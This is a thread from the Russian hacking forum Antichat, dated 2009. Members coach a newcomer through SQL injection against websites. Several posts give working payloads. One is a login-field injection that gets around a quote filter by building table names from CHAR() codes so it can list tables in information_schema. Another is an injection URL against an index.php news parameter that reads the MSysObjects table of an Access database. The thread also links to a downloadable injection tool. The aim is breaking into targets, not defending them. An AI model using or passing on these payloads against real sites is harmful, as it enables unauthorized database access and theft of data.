ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #4951  
Старый 23.01.2009, 18:34
Аватар для groundhog
groundhog
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549

Репутация: 1318


Отправить сообщение для groundhog с помощью ICQ
По умолчанию

Gemini12, создай у себя HTML файл с тем содержимым что я тебе написал...
 
Ответить с цитированием

  #4952  
Старый 23.01.2009, 18:57
Аватар для Gemini12
Gemini12
Познающий
Регистрация: 24.12.2008
Сообщений: 54
Провел на форуме:
253038

Репутация: 9
Отправить сообщение для Gemini12 с помощью ICQ
По умолчанию

Все! Понял! Благодарю!
 
Ответить с цитированием

  #4953  
Старый 23.01.2009, 19:02
Аватар для Gemini12
Gemini12
Познающий
Регистрация: 24.12.2008
Сообщений: 54
Провел на форуме:
253038

Репутация: 9
Отправить сообщение для Gemini12 с помощью ICQ
По умолчанию

Цитата:
Сообщение от groundhog  
Gemini12, чтобы обойти фильтр кавычек, в поле Логин вставляй преобразованные символьные строки:

' OR 1=(SELECT TOP 1 table_name FROM information_schema.tables WHERE table_name!=char(115)+char(104)+char(95)+char(99)+ char(117)+char(115)+char(116)+char(111)+char(109)+ char(101)+char(114)+char(115))--
А что зашифровал?
 
Ответить с цитированием

  #4954  
Старый 23.01.2009, 19:05
Аватар для groundhog
groundhog
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549

Репутация: 1318


Отправить сообщение для groundhog с помощью ICQ
По умолчанию

Ну ты же таблицы перебираешь? Выбрал таблицу с именем 'test' значит на следующий раз тебе нужно её отбросить, вот ты её таким образом шифруешь и пишешь в условии WHERE ... ... ... ... AND table_name!=CHAR(...)+CHAR(...)+CHAR(...)+CHAR(... ). Где в CHAR отдельные ASCII коды букв - t, e, s и t.
 
Ответить с цитированием

  #4955  
Старый 23.01.2009, 19:20
Аватар для Pashkela
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

2 Gemini12:

на, не парься http://slil.ru/26575601

readme в комплекте, шифруй только имена таблиц, кавычки не шифруй
 
Ответить с цитированием

  #4956  
Старый 23.01.2009, 19:39
Аватар для Gemini12
Gemini12
Познающий
Регистрация: 24.12.2008
Сообщений: 54
Провел на форуме:
253038

Репутация: 9
Отправить сообщение для Gemini12 с помощью ICQ
По умолчанию

Цитата:
Сообщение от Pashkela  
2 Gemini12:

на, не парься http://slil.ru/26575601

readme в комплекте, шифруй только имена таблиц, кавычки не шифруй
пароль помнишь?
 
Ответить с цитированием

  #4957  
Старый 23.01.2009, 19:48
Аватар для Gemini12
Gemini12
Познающий
Регистрация: 24.12.2008
Сообщений: 54
Провел на форуме:
253038

Репутация: 9
Отправить сообщение для Gemini12 с помощью ICQ
По умолчанию

Подскажите по Microsoft Database:
пишу
Цитата:
http://site.ru/index.php?newsid=1+or+1=(SELECT+TOP+1+TABLE_NAME+F ROM+MSysObjects)
выдает
Record(s) cannot be read; no read permission on 'MSysObjects'.
что можно сделать?
 
Ответить с цитированием

  #4958  
Старый 23.01.2009, 19:54
Аватар для R1dex
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию

MSysObjects - системная табла. К ней довольно часто закрыт доступ.
 
Ответить с цитированием

  #4959  
Старый 23.01.2009, 19:54
Аватар для groundhog
groundhog
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549

Репутация: 1318


Отправить сообщение для groundhog с помощью ICQ
По умолчанию

Разочароваться можно (как вариант).

З.Ы. Прав нету у тебя читать оттуда.
 
Ответить с цитированием

  #4960  
Старый 23.01.2009, 19:57
Аватар для Gemini12
Gemini12
Познающий
Регистрация: 24.12.2008
Сообщений: 54
Провел на форуме:
253038

Репутация: 9
Отправить сообщение для Gemini12 с помощью ICQ
По умолчанию

Цитата:
Сообщение от R1dex  
MSysObjects - системная табла. К ней довольно часто закрыт доступ.
Это я уже понял
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ